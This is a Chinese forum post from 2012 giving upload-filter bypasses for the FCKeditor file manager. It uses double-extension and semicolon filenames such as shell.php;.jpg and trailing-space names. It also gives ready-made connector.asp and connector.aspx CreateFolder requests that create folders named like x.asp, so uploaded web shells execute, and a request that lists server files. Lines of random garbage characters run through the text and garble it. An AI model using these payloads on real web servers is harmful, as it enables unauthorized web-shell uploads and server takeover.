很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
. d x4 f( N9 T5 r K9 b4 }" t3 }8 Z4 A
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
0 x' S" v. N) N
9 P% F4 Q" z* w; T" j2 N继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。* r9 Q2 j6 }3 k! j1 L6 b
8 H8 ^3 f: j; g突破建立文件夹:
* @; I4 l% _5 G& @: L
) N y+ K: }7 H/ x' w/ @editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp. ?3 }% `! A B5 F- w1 ] u- _
: v: I8 r) ~9 R0 e" } o参数:
% @: p' n* l9 @1 s
7 i' J/ F. s) X, T: u! r当前目录名:CurrentFolder=/qing.asp
" V$ y+ _; U7 V- x$ H2 O( P2 t! n$ j5 X( t8 ]3 d( U# T" \
新的目录名:NewFolderName=x.asp
% L9 A6 D3 E6 D9 k
# G' t5 g, A: a其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
9 D5 T5 d, @* u. [7 a& x. A1 Z" |/ t# V6 v/ @3 _: b
那么 x.asp 就已经建立生成了,此方法百试百灵! }6 E/ u' Q7 d) Z$ o: f
$ y% E% ~9 w: d新建文件夹参数 x.asp,基本都能搞定。: [7 I9 h z* d0 V- p$ e' w
& a6 l2 ?) \. `0 o* g8 f* |
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
6 O9 \& s {' r& X0 \0 t) ~1 d! s/ f& r% w1 D/ T
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp+ C: h! j4 Y" D, i' z; ?' _
; m9 ?7 r! `" U# E* {
获取文件列表
7 @0 D% d- h, m) l0 h5 \4 ? aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F. W5 R+ x3 [3 F# M1 L
7 x! T* |1 v) g+ w# W! M7 y0 _
|
发表于 2012-12-31 09:27:09
收藏
支持
反对